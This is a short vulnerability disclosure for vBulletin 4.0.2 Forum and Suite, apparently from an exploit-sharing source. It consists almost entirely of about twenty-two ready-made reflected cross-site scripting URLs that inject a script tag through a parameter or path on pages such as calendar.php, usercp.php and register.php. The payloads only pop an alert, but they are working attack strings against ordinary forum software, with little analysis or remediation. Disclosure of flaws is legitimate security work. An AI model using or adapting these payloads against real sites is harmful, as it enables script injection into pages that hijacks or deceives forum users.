Security Alert: Multiple XSS Vulnerabilities in Internet Brands’s vBulletin 4 Forum and vBulletin 4 Suite

Vendor: Internet Brands (NASDAQ: INET)
Product: vBulletin 4 Forum, vBulletin 4 Suite
Version: 4.0.2
Vector of Attack: Cross Site Scripting
Source: Inje3ct0rvBulletin.com

Details:

# Exploit  :
http://127.0.0.1/upload/calendar.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/faq.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forum.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/usercp.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/subscription.php?
acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showgroups.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/sendmessage.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/search.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/register.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/profile.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/private.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/online.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/newthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/misc.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/memberlist.php?=>”‘><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/member.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/inlinemod.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/index.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forumdisplay.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
Additional vulnerabilities found by vBulletin Forum Members
http://127.0.0.1/upload/content.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/blog.php/>”><ScRiPt>alert(213771818860)</ScRiPt>